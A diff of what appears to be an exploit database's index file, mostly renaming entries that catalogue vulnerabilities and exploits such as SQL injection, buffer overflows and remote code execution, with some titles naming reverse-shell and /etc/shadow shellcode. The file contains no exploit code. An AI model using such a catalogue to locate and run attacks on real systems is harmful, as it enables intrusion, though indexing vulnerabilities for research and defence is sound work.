PoC",2012-08-28,LiquidWorm,windows,dos,0 +20871,platforms/php/webapps/20871.txt,"CommPort <= 1.01 - Multiple Vulnerabilities",2012-08-28,"Jean Pascal Pereira",php,webapps,0 +20872,platforms/php/webapps/20872.txt,"mieric addressBook <= 1.0 - SQL Injection Vulnerability",2012-08-28,"Jean Pascal Pereira",php,webapps,0 20873,platforms/php/webapps/20873.html,"RV Article Publisher CSRF Vulnerability",2012-08-28,DaOne,php,webapps,0 20874,platforms/php/webapps/20874.html,"RV Shopping Cart CSRF Vulnerability",2012-08-28,DaOne,php,webapps,0 20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0 @@ -18175,13 +18175,13 @@ id,file,description,date,author,platform,type,port 20889,platforms/multiple/remote/20889.txt,"GNU Privacy Guard 1.0.x Format String Vulnerability",2001-05-29,"fish stiqz",multiple,remote,0 20890,platforms/multiple/remote/20890.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 HTML tag Script-filtering Bypass Vulnerability",2001-05-29,"eDvice Security Services",multiple,remote,0 20891,platforms/multiple/remote/20891.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 Unicode Script-filtering Bypass Vulnerability",2001-05-29,"eDvice Security Services",multiple,remote,0 -20892,platforms/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 Undocumented Community String Vulnerability",2001-03-25,"Jacek Lipkowski",hardware,remote,0 +20892,platforms/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 - Undocumented Community String Vulnerability",2001-03-25,"Jacek Lipkowski",hardware,remote,0 20893,platforms/windows/remote/20893.txt,"Trend Micro InterScan VirusWall for Windows NT 3.4/3.5/3.51 Remote Reconfiguration Vulnerability",2001-05-24,snsadv,windows,remote,0 -20894,platforms/multiple/remote/20894.txt,"Acme.Serve v1.7 Arbitrary File Access Vulnerability",2001-05-31,"Adnan Rahman",multiple,remote,0 +20894,platforms/multiple/remote/20894.txt,"Acme.Serve 1.7 - Arbitrary File Access Vulnerability",2001-05-31,"Adnan Rahman",multiple,remote,0 20895,platforms/cgi/remote/20895.txt,"WebTrends Enterprise Reporting Server 3.1 c/3.5 Source Code Disclosure",2001-06-03,"Auriemma Luigi",cgi,remote,0 20896,platforms/windows/remote/20896.txt,"OReilly Software WebBoard 4.10.30 Pager Hostile JavaScript Vulnerability",2001-06-02,"Helmuth Antholzer",windows,remote,0 -20897,platforms/linux/local/20897.sh,"Debian 2.1/2.2 Man Malicious Cache File Creation Vulnerability",2001-06-01,jenggo,linux,local,0 -20898,platforms/linux/local/20898.sh,"RedHat 6.1/6.2/7.0/7.1 Man Malicious Cache File Creation Vulnerability",2001-05-18,jenggo,linux,local,0 +20897,platforms/linux/local/20897.sh,"Debian 2.1/2.2 - Man Cache File Creation Vulnerability",2001-06-01,jenggo,linux,local,0 +20898,platforms/linux/local/20898.sh,"RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation Vulnerability",2001-05-18,jenggo,linux,local,0 20899,platforms/windows/remote/20899.txt,"Microsoft Outlook 97/98/2000/4/5 Address Book Spoofing Vulnerability",2001-06-05,3APA3A,windows,remote,0 20900,platforms/linux/local/20900.txt,"Exim 3.x Format String Vulnerability",2001-06-06,"Megyer Laszlo",linux,local,0 20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0 @@ -18284,14 +18284,14 @@ id,file,description,date,author,platform,type,port 21003,platforms/windows/remote/21003.txt,"Microsoft Outlook 98/2000/2002 Unauthorized Email Access Vulnerability",2001-07-12,"Georgi Guninski",windows,remote,0 21004,platforms/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 Arbitrary Code Execution Vulnerability",2001-07-12,"Georgi Guninski",windows,remote,0 21005,platforms/php/webapps/21005.txt,"Admidio 2.3.5 Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 -21006,platforms/windows/dos/21006.txt,"MAILsweeper for SMTP 4.2.1 ,F-Secure Anti-Virus 5.0.2/5.2.1 File Scanner Malicious Archive DoS",2001-07-12,"Michel Arboi",windows,dos,0 +21006,platforms/windows/dos/21006.txt,"MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 & 5.2.1 - File Scanner Malicious Archive DoS",2001-07-12,"Michel Arboi",windows,dos,0 21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition (add_rating.php, id parameter) Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 21008,platforms/cgi/remote/21008.txt,"Interactive Story 1.3 Directory Traversal Vulnerability",2001-07-15,qDefense,cgi,remote,0 21009,platforms/windows/remote/21009.c,"ArGoSoft FTP Server 1.2.2 .2 Weak Password Encryption Vulnerability",2001-07-12,byterage,windows,remote,0 21010,platforms/linux/local/21010.sh,"XFree86 X11R6 3.3.2 XMan ManPath Environment Variable Buffer Overflow",2001-06-11,kf,linux,local,0 21011,platforms/hardware/remote/21011.pl,"3Com SuperStack II PS Hub 40 TelnetD Weak Password Protection Vulnerability",2001-07-12,Siberian,hardware,remote,0 21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 Denial of Service Vulnerability",2001-07-17,"Andy Gavin",multiple,dos,0 -21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 Malicious Manual Page Cache File Creation Vulnerability",2001-07-17,josh,linux,local,0 +21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation Vulnerability",2001-07-17,josh,linux,local,0 21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 SecureRemote Network Information Leak Vulnerability",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0 21016,platforms/windows/remote/21016.c,"ID Software Quake 3 ""smurf attack"" Denial of Service vulnerability",2001-07-17,"Andy Gavin",windows,remote,0 21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 Reverse Proxy Vulnerability",2001-07-18,"Paul Nasrat",linux,remote,0 @@ -18329,7 +18329,7 @@ id,file,description,date,author,platform,type,port 21050,platforms/linux/remote/21050.c,"NCSA httpd 1.x Buffer Overflow Vulnerability (2)",1995-02-17,Xtremist,linux,remote,0 21052,platforms/jsp/webapps/21052.txt,"JIRA 4.4.3, GreenHopper < 5.9.8 Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 21053,platforms/multiple/webapps/21053.txt,"Splunk <= 4.3.3 Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 -21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages v2.0 SQL Injection Vulnerability",2012-09-04,L0n3ly-H34rT,php,webapps,0 +21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection Vulnerability",2012-09-04,L0n3ly-H34rT,php,webapps,0 21056,platforms/php/webapps/21056.txt,"Group Office Calendar (calendar/json.php) SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 21057,platforms/windows/remote/21057.txt,"MS IIS 4/5/6 Internal IP Address/Internal Network Name Disclosure Vulnerability",2001-08-08,"Marek Roy",windows,remote,0 21058,platforms/solaris/local/21058.c,"Solaris 2.6/7/8 SPARC xlock Heap Overflow Vulnerability",2001-08-10,Nsfocus,solaris,local,0 @@ -18357,7 +18357,7 @@ id,file,description,date,author,platform,type,port 21080,platforms/multiple/remote/21080.rb,"JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",2012-09-05,metasploit,multiple,remote,0 21081,platforms/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP Multiple Path Injection",2012-09-05,"Andrea Fabrizi",hardware,webapps,0 21082,platforms/multiple/webapps/21082.txt,"Novell Sentinel Log Manager <= 1.2.0.1 Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0 -21084,platforms/php/webapps/21084.txt,"ES Job Search Engine v3.0 SQL Injection Vulnerability",2012-09-05,Vulnerability-Lab,php,webapps,0 +21084,platforms/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection Vulnerability",2012-09-05,Vulnerability-Lab,php,webapps,0 21085,platforms/asp/webapps/21085.txt,"Ektron CMS 8.5.0 Multiple Vulnerabilities",2012-09-05,"Sense of Security",asp,webapps,0 21088,platforms/unix/remote/21088.pl,"AOLServer 3 Long Authentication String Buffer Overflow Vulnerability (1)",2001-08-22,"Nate Haggard",unix,remote,0 21089,platforms/unix/remote/21089.c,"AOLServer 3 Long Authentication String Buffer Overflow Vulnerability (2)",2001-09-05,qitest1,unix,remote,0 @@ -18402,7 +18402,7 @@ id,file,description,date,author,platform,type,port 21129,platforms/cgi/remote/21129.java,"iBill Management Script Weak Hard-Coded Password Vulnerability",2001-10-25,"MK Ultra",cgi,remote,0 21130,platforms/windows/local/21130.c,"Microsoft Windows NT 3/4 CSRSS Memory Access Violation Vulnerability",2001-10-26,"Michael Wojcik",windows,local,0 21131,platforms/windows/dos/21131.txt,"Microsoft Windows 2000/XP GDI Denial of Service Vulnerability",2001-10-29,PeterB,windows,dos,0 -21132,platforms/php/webapps/21132.txt,"Cannonbolt Portfolio Manager v1.0 Multiple Vulnerabilities",2012-09-07,LiquidWorm,php,webapps,0 +21132,platforms/php/webapps/21132.txt,"Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities",2012-09-07,LiquidWorm,php,webapps,0 21133,platforms/php/webapps/21133.txt,"Clipster Video Persistent XSS Vulnerability",2012-09-07,DaOne,php,webapps,0 21134,platforms/hardware/webapps/21134.txt,"Sitecom Home Storage Center Auth Bypass Vulnerability",2012-09-07,"Mattijs van Ommeren",hardware,webapps,0 21135,platforms/php/webapps/21135.txt,"TestLink 1.9.3 CSRF Vulnerability",2012-09-07,"High-Tech Bridge SA",php,webapps,0 @@ -18429,7 +18429,7 @@ id,file,description,date,author,platform,type,port 21159,platforms/linux/local/21159.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make Buffer Overflow Vulnerability",2001-11-21,IhaQueR@IRCnet,linux,local,0 21160,platforms/multiple/remote/21160.txt,"IBM Informix Web Datablade 3.x/4.1 Directory Traversal Vulnerability",2001-11-22,"Beck Mr.R",multiple,remote,0 21161,platforms/unix/remote/21161.txt,"Wu-Ftpd 2.6 File Globbing Heap Corruption Vulnerability",2001-11-27,"Core Security Technologies",unix,remote,0 -21162,platforms/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial Of Service Vulnerability (1)",2001-11-29,"Alex Hernandez",windows,dos,0 +21162,platforms/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial Of Service Vulnerability (1)",2001-11-29,"Alex Hernandez",windows,dos,0 21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial Of Service Vulnerability (2)",2001-11-29,"Alex Hernandez",windows,dos,0 21164,platforms/windows/remote/21164.txt,"Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions Vulnerability",2001-11-26,StatiC,windows,remote,0 21165,platforms/php/webapps/21165.txt,"PHPNuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x user.php uname Parameter XSS Vulnerability",2001-12-03,"Cabezon AurĂ©lien",php,webapps,0 @@ -18457,8 +18457,8 @@ id,file,description,date,author,platform,type,port 21187,platforms/cgi/webapps/21187.txt,"Aktivate 1.0 3 Shopping Cart Cross-Site Scripting Vulnerability",2001-12-18,"Tamer Sahin",cgi,webapps,0 21188,platforms/windows/remote/21188.c,"Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (1)",2001-12-20,"Gabriel Maggiotti",windows,remote,0 21189,platforms/windows/remote/21189.c,"Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (2)",2001-12-20,JOCANOR,windows,remote,0 -21190,platforms/linux/remote/21190.rb,"WAN Emulator v2.3 Command Execution",2012-09-10,metasploit,linux,remote,0 -21191,platforms/linux/remote/21191.rb,"Openfiler v2.x NetworkCard Command Execution",2012-09-10,metasploit,linux,remote,0 +21190,platforms/linux/remote/21190.rb,"WAN Emulator 2.3 - Command Execution",2012-09-10,metasploit,linux,remote,0 +21191,platforms/linux/remote/21191.rb,"Openfiler 2.x - NetworkCard Command Execution",2012-09-10,metasploit,linux,remote,0 21192,platforms/linux/remote/21192.c,"STunnel 3.x Client Negotiation Protocol Format String Vulnerability",2001-12-22,deltha,linux,remote,0 21193,platforms/multiple/remote/21193.txt,"DeleGate 7.7.1 Cross-Site Scripting Vulnerability",2001-12-28,"SNS Research",multiple,remote,0 21194,platforms/cgi/remote/21194.txt,"Abe Timmerman zml.cgi File Disclosure Vulnerability",2001-12-31,blackshell,cgi,remote,0 @@ -18487,7 +18487,7 @@ id,file,description,date,author,platform,type,port 21217,platforms/linux/local/21217.sh,"CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (2)",2002-01-13,atomi,linux,local,0 21218,platforms/linux/local/21218.sh,"CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (3)",2002-01-13,Anonymous,linux,local,0 21219,platforms/linux/local/21219.sh,"CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (4)",2002-01-13,"Karol Wiesek",linux,local,0 -21220,platforms/php/webapps/21220.txt,"VICIDIAL Call Center Suite <=2.2.1-237 Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 +21220,platforms/php/webapps/21220.txt,"VICIDIAL Call Center Suite <= 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 21221,platforms/php/webapps/21221.txt,"Joomla RokModule Component (index.php, module parameter) Blind SQLi",2012-09-10,Yarolinux,php,webapps,0 21222,platforms/php/webapps/21222.txt,"SiteGo Remote File Inclusion Vulnerability",2012-09-10,L0n3ly-H34rT,php,webapps,0 21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 Local Denial of Service Vulnerability",2012-09-10,halfdog,lin_x86-64,dos,0 @@ -18495,7 +18495,7 @@ id,file,description,date,author,platform,type,port 21226,platforms/linux/local/21226.c,"IMLib2 Home Environment Variable Buffer Overflow Vulnerability",2002-01-13,"Charles Stevenson",linux,local,0 21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0 21228,platforms/windows/remote/21228.c,"Sambar Server 5.1 Sample Script Denial Of Service Vulnerability",2002-02-06,"Tamer Sahin",windows,remote,0 -21229,platforms/linux/local/21229.txt,"AT 3.1.8 Maliciously Formatted Time Heap Overflow Vulnerability",2002-01-16,"SuSE Security",linux,local,0 +21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow Vulnerability",2002-01-16,"SuSE Security",linux,local,0 21230,platforms/php/webapps/21230.txt,"PHPNuke 4.x/5.x Remote Arbitrary File Include Vulnerability",2002-01-16,"Handle Nopman",php,webapps,0 21231,platforms/linux/local/21231.c,"Chinput 3.0 Environment Variable Buffer Overflow Vulnerability",2002-01-16,xperc,linux,local,0 21232,platforms/multiple/dos/21232.c,"Oracle 8i dbsnmp Command Remote Denial of Service Vulnerability",2002-01-17,benjurry,multiple,dos,0 @@ -18517,7 +18517,7 @@ id,file,description,date,author,platform,type,port 21248,platforms/linux/local/21248.txt,"User-Mode Linux Kernel 2.4.17 -8 Memory Access Vulnerability",2000-08-25,"Andrew Griffiths",linux,local,0 21249,platforms/cgi/remote/21249.txt,"Agora.CGI 3/4 Debug Mode Path Disclosure Vulnerability",2002-01-28,superpetz,cgi,remote,0 21250,platforms/php/webapps/21250.txt,"Webify Blog Arbitrary File Deletion Vulnerability",2012-09-11,JiKo,php,webapps,0 -21251,platforms/php/webapps/21251.txt,"akcms v4.2.4 Information Disclosure Vulnerability",2012-09-11,L0n3ly-H34rT,php,webapps,0 +21251,platforms/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure Vulnerability",2012-09-11,L0n3ly-H34rT,php,webapps,0 21252,platforms/arm/shellcode/21252.asm,"[Raspberry Pi] Linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337)",2012-09-11,midnitesnake,arm,shellcode,0 21253,platforms/arm/shellcode/21253.asm,"[Raspberry Pi] Linux/ARM - execve(""/bin/sh"", [0], [0 vars]) - 30 bytes",2012-09-11,midnitesnake,arm,shellcode,0 21254,platforms/arm/shellcode/21254.asm,"[Raspberry Pi] Linux/ARM - chmod(""/etc/shadow"", 0777) - 41 bytes",2012-09-11,midnitesnake,arm,shellcode,0 @@ -18586,12 +18586,12 @@ id,file,description,date,author,platform,type,port 21319,platforms/aix/webapps/21319.txt,"Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF",2012-09-14,modpr0be,aix,webapps,0 21320,platforms/windows/local/21320.pl,"Internet Download Manager All Versions SEH Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 21323,platforms/linux/local/21323.c,"libdbus 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation",2012-07-17,"Sebastian Krahmer",linux,local,0 -21324,platforms/php/webapps/21324.txt,"LuxCal v2.7.0 Multiple Remote Vulnerabilities",2012-09-17,L0n3ly-H34rT,php,webapps,0 +21324,platforms/php/webapps/21324.txt,"LuxCal 2.7.0 - Multiple Remote Vulnerabilities",2012-09-17,L0n3ly-H34rT,php,webapps,0 21326,platforms/windows/dos/21326.txt,"Novell Groupwise 8.0.2 HP3 and 2012 Integer Overflow Vulnerability",2012-09-17,"Francis Provencher",windows,dos,0 -21327,platforms/php/webapps/21327.txt,"webERP <=4.08.4 WorkOrderEntry.php SQL Injection Vulnerability",2012-09-17,modpr0be,php,webapps,0 +21327,platforms/php/webapps/21327.txt,"webERP <= 4.08.4 - WorkOrderEntry.php SQL Injection Vulnerability",2012-09-17,modpr0be,php,webapps,0 21329,platforms/php/webapps/21329.txt,"Auxilium PetRatePro Multiple Vulnerabilities",2012-09-17,DaOne,php,webapps,0 21330,platforms/php/webapps/21330.txt,"Netsweeper WebAdmin Portal Multiple Vulnerabilities",2012-09-17,"Jacob Holcomb",php,webapps,0 -21331,platforms/windows/local/21331.py,"NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local,0 +21331,platforms/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - MRUList201202.dat File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local,0 21333,platforms/windows/dos/21333.txt,"AOL Instant Messenger 4.x Hyperlink Denial Of Service Vulnerability",2002-03-01,"NtWaK0 & Recon",windows,dos,0 21334,platforms/php/remote/21334.pl,"Cobalt RaQ 2.0/3.0/4.0 XTR MultiFileUpload.php Authentication Bypass Vulnerability (1)",2002-03-08,"Wouter ter Maat",php,remote,0 21335,platforms/php/remote/21335.sh,"Cobalt RaQ 2.0/3.0/4.0 XTR MultiFileUpload.php Authentication Bypass Vulnerability (2)",2002-03-08,"Wouter ter Maat",php,remote,0 @@ -18677,7 +18677,7 @@ id,file,description,date,author,platform,type,port 21415,platforms/cgi/remote/21415.txt,"CGIScript.NET csMailto Hidden Form Field Remote Command Execution Vulnerability",2002-04-23,"Steve Gustin",cgi,remote,0 21416,platforms/windows/dos/21416.txt,"Internet Explorer 5/6 Recursive JavaScript Event Denial of Service Vulnerability",2002-04-24,"Berend-Jan Wever",windows,dos,0 21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem Auth Bypass",2012-09-20,"Glafkos Charalambous ",hardware,webapps,0 -21418,platforms/php/webapps/21418.txt,"Manhali v1.8 Local File Inclusion Vulnerability",2012-09-20,L0n3ly-H34rT,php,webapps,0 +21418,platforms/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion Vulnerability",2012-09-20,L0n3ly-H34rT,php,webapps,0 21419,platforms/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 DOS Device Denial of Service Vulnerability",2002-04-24,ERRor,windows,dos,0 21420,platforms/linux/local/21420.c,"Sudo 1.6.x Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0 21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x Login Bypass Vulnerability",2002-04-25,"Ulf Harnhammar",php,webapps,0 @@ -18781,7 +18781,7 @@ id,file,description,date,author,platform,type,port 21520,platforms/linux/remote/21520.py,"QNX QCONN Remote Command Execution Vulnerability",2012-09-25,Mor!p3r,linux,remote,0 21521,platforms/php/webapps/21521.txt,"ViArt Shop Enterprise 4.1 Arbitrary Command Execution Vulnerability",2012-09-25,LiquidWorm,php,webapps,0 21523,platforms/hardware/dos/21523.txt,"Cisco DPC2100 Denial of Service",2012-09-26,"Daniel Smith",hardware,dos,0 -21524,platforms/php/webapps/21524.txt,"ViArt Shop Evaluation v4.1 Multiple Remote File Inclusion Vulnerabilities",2012-09-26,L0n3ly-H34rT,php,webapps,0 +21524,platforms/php/webapps/21524.txt,"ViArt Shop Evaluation 4.1 - Multiple Remote File Inclusion Vulnerabilities",2012-09-26,L0n3ly-H34rT,php,webapps,0 21525,platforms/php/webapps/21525.txt,"Geeklog 1.3.5 Multiple Cross Site Scripting Vulnerabilities",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21526,platforms/php/webapps/21526.txt,"MyHelpDesk 20020509 Cross-Site Scripting Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21527,platforms/php/webapps/21527.txt,"MyHelpDesk 20020509 SQL Injection Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 @@ -18812,7 +18812,7 @@ id,file,description,date,author,platform,type,port 21552,platforms/php/webapps/21552.txt,"PHP Classifieds 6.0.5 Cross-Site Scripting Vulnerability",2002-06-14,windows-1256,php,webapps,0 21553,platforms/cgi/webapps/21553.txt,"Mewsoft NetAuction 3.0 Cross Site Scripting Vulnerability",2002-06-14,windows-1256,cgi,webapps,0 21554,platforms/windows/remote/21554.txt,"Imatix Xitami 2.5 GSL Template Cross Site Scripting Vulnerability",2002-06-14,"Matthew Murphy",windows,remote,0 -21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 Cross-site Scripting Vulnerability",2002-06-14,"Dave Palumbo",windows,remote,0 +21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 Cross-site Scripting Vulnerability",2002-06-14,"Dave Palumbo",windows,remote,0 21556,platforms/windows/dos/21556.txt,"Microsoft Internet Explorer 5/6 CSSText Bold Font Denial Of Service",2002-06-15,"Oleg A. Cheremisin",windows,dos,0 21557,platforms/php/webapps/21557.txt,"Zeroboard 4.1 PHP Include File Arbitrary Command Execution Vulnerability",2002-06-15,onlooker,php,webapps,0 21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 MagicCard.CGI Arbitrary File Disclosure Vulnerability",2002-06-15,cult,cgi,webapps,0 @@ -18822,14 +18822,14 @@ id,file,description,date,author,platform,type,port 21562,platforms/java/webapps/21562.txt,"Wolfram Research webMathematica 4.0 File Disclosure Vulnerability",2002-06-17,"Andrew Badr",java,webapps,0 21563,platforms/php/webapps/21563.txt,"OSCommerce 2.1 Remote File Include Vulnerability",2002-06-16,"Tim Vandermeerch",php,webapps,0 21564,platforms/php/webapps/21564.txt,"PHP-Address 0.2 e Remote File Include Vulnerability",2002-06-17,"Tim Vandermeerch",php,webapps,0 -21565,platforms/unix/local/21565.pl,"Interbase 6.0 GDS_Drop Interbase Environment Variable Buffer Overflow (1)",2002-06-15,stripey,unix,local,0 +21565,platforms/unix/local/21565.pl,"Interbase 6.0 GDS_Drop Interbase Environment Variable Buffer Overflow (1)",2002-06-15,stripey,unix,local,0 21566,platforms/unix/local/21566.c,"Interbase 6.0 GDS_Drop Interbase Environment Variable Buffer Overflow (2)",2002-06-18,bob,unix,local,0 21567,platforms/cgi/webapps/21567.pl,"WebScripts WebBBS 4.x/5.0 Remote Command Execution Vulnerability",2002-06-06,"NERF Security",cgi,webapps,0 21568,platforms/linux/local/21568.c,"Cisco VPN Client for Unix 3.5.1 Local Buffer Overflow Vulnerability",2002-06-19,methodic,linux,local,0 21569,platforms/windows/dos/21569.txt,"MS SQL Server 2000,MS Jet 4.0 Engine Unicode Buffer Overflow Vulnerability",2002-06-19,NGSSoftware,windows,dos,0 21570,platforms/php/webapps/21570.txt,"BasiliX Webmail 1.1 Message Content Script Injection Vulnerability",2002-06-19,"Ulf Harnhammar",php,webapps,0 21571,platforms/irix/remote/21571.c,"SGI IRIX 6.x rpc.xfsmd Remote Command Execution Vulnerability",2002-06-20,"Last Stage of Delirium",irix,remote,0 -21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 New Player Flood Denial Of Service Vulnerability",2002-06-20,"Auriemma Luigi",multiple,dos,0 +21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 New Player Flood Denial Of Service Vulnerability",2002-06-20,"Auriemma Luigi",multiple,dos,0 21573,platforms/cgi/webapps/21573.txt,"YaBB 1 Invalid Topic Error Page Cross Site Scripting Vulnerability",2002-06-21,methodic,cgi,webapps,0 21574,platforms/unix/remote/21574.txt,"Pirch IRC Client 98 Malformed Link Buffer Overrun Vulnerability",2002-06-21,"David Rude II",unix,remote,0 21575,platforms/multiple/dos/21575.txt,"Mod_SSL 2.8.x Off-By-One HTAccess Buffer Overflow Vulnerability",2002-06-22,"Frank DENIS",multiple,dos,0 @@ -18850,7 +18850,7 @@ id,file,description,date,author,platform,type,port 21590,platforms/php/webapps/21590.txt,"PHPAuction 1/2 Unauthorized Administrative Access Vulnerability",2002-07-02,ethx,php,webapps,0 21591,platforms/windows/remote/21591.sh,"ArGoSoft 1.8 Mail Server Directory Traversal Vulnerability",2002-07-06,"team n.finity",windows,remote,0 21592,platforms/unix/local/21592.c,"Sun SunPCi II VNC Software 2.3 Password Disclosure Vulnerability",2002-07-03,"Richard van den Berg",unix,local,0 -21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 DoS Amplifier Vulnerability",2002-07-03,"Auriemma Luigi",multiple,dos,0 +21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 DoS Amplifier Vulnerability",2002-07-03,"Auriemma Luigi",multiple,dos,0 21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 Malformed TCP Packet Denial Of Service Vulnerability",2002-07-04,altomo,windows,dos,0 21595,platforms/windows/remote/21595.c,"Nullsoft Winamp 2.80 Automatic Update Check Buffer Overflow Vulnerability",2002-07-03,Anonymous,windows,remote,0 21596,platforms/osx/remote/21596.txt,"MacOS X 10.1.x SoftwareUpdate Arbitrary Package Installation Vulnerability",2002-07-08,"Russell Harding",osx,remote,0 @@ -18882,8 +18882,8 @@ id,file,description,date,author,platform,type,port 21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 Cross-Site Scripting Vulnerability",2002-07-17,Pistone,php,webapps,0 21623,platforms/linux/local/21623.txt,"Python 1.5.2 Pickle Unsafe eval() Code Execution Vulnerability",2002-07-17,"Jeff Epler",linux,local,0 21624,platforms/linux/local/21624.py,"Python 1.5/1.6/2.0/2.1.x Pickle Class Constructor Arbitrary Code Execution",2002-07-17,"Jeff Epler",linux,local,0 -21625,platforms/windows/remote/21625.pl,"Trend Micro InterScan VirusWall for Windows NT 3.52 Space Gap Scan Bypass",2002-07-18,SecuriTeam,windows,remote,0 -21626,platforms/windows/remote/21626.c,"3.3/4.0/4.2 MERCUR Mailserver Control-Service Buffer Overflow",2002-07-16,Anonymous,windows,remote,0 +21625,platforms/windows/remote/21625.pl,"Trend Micro InterScan VirusWall for Windows NT 3.52 Space Gap Scan Bypass",2002-07-18,SecuriTeam,windows,remote,0 +21626,platforms/windows/remote/21626.c,"3.3/4.0/4.2 MERCUR Mailserver Control-Service Buffer Overflow",2002-07-16,Anonymous,windows,remote,0 21627,platforms/multiple/remote/21627.txt,"Oracle Reports Server 6.0.8/9.0.2 Information Disclosure Vulnerability",2002-07-18,skp,multiple,remote,0 21628,platforms/php/webapps/21628.txt,"Geeklog 1.3.5 HTML Attribute Cross Site Scripting Vulnerability",2002-07-19,"Ulf Harnhammar",php,webapps,0 21629,platforms/windows/local/21629.txt,"Adobe eBook Reader 2.2 File Restoration Privilege Escalation Vulnerability",2002-07-19,"Vladimir Katalov",windows,local,0 @@ -18920,14 +18920,14 @@ id,file,description,date,author,platform,type,port 21661,platforms/php/webapps/21661.txt,"DotProject 0.2.1 User Cookie Authentication Bypass Vulnerability",2002-07-29,pokleyzz,php,webapps,0 21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 XML File Attachment Script Execution Vulnerability",2002-07-29,http-equiv,windows,remote,0 21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x Client Query Remote Buffer Overflow Vulnerability",2002-07-25,Jedi/Sector,linux,remote,0 -21665,platforms/php/webapps/21665.txt,"phptax 0.8 <= Remote Code Execution Vulnerability",2012-10-02,"Jean Pascal Pereira",php,webapps,0 +21665,platforms/php/webapps/21665.txt,"phptax 0.8 - Remote Code Execution Vulnerability",2012-10-02,"Jean Pascal Pereira",php,webapps,0 21666,platforms/linux/local/21666.txt,"soapbox <= 0.3.1 Local Root Exploit",2012-10-02,"Jean Pascal Pereira",linux,local,0 21667,platforms/linux/local/21667.c,"MM 1.0.x/1.1.x Shared Memory Library Temporary File Privilege Escalation Vulnerability",2002-07-29,"Sebastian Krahmer",linux,local,0 21668,platforms/php/webapps/21668.txt,"ShoutBox 1.2 Form Field HTML Injection Vulnerability",2002-07-29,delusion,php,webapps,0 